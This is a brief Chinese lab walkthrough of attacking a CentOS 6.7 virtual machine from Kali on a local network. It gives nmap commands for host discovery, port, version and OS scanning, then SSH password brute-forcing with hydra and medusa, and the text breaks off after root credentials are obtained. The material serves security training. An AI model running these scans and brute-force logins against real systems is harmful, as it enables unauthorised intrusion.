一、实验环境
测试机:Kali
靶机:CentOS 6.7
两台虚拟主机需在同一局域网中。
二、实验步骤
一)主动信息收集
1、主机发现
nmap 192.168.247.0/24 -sn //-sn 只做主机发现,不做端口扫描
2、端口扫描,发现只有22号端口开放
nmap -sS 192.168.247.140 -p 1-65535 --open
3、版本信息
命令一、nmap -sT 192.168.247.140 -p 22 –script=banner.nse
命令二、nmap -sV -T4 -p 22 192.168.247.140
4、操作系统识别
nmap 192.168.247.140 -O
二)开放端口使用(22)
1、SSH密码爆解
命令一、hydra -L 用户名字典 -P 密码字典 目标IP ssh(由于版本问题,失败,但方法正确)
命令二、medusa -M ssh -h 192.168.247.140 -U user.txt -P pass.txt -t 6
得到远程登录目标主机的账号和密码(rootÿ